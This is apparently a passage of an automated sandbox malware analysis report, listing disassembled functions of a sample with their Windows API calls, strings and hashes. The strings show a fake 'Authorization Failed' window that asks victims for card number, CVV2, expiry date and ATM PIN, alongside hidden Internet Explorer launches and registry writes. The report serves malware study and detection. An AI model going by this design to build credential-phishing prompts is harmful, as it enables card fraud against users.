                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 86 4079ac-4079af 81->86 89 4079e1-4079e3 82->89 88 4079c3-4079c8 83->88 84->83 87 4079b3 84->87 90 4079b1 86->90 91 4079ab 86->91 87->80 88->82 92 4079ca-4079cd 88->92 90->82 91->86 92->82 93 4079c2 92->93 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
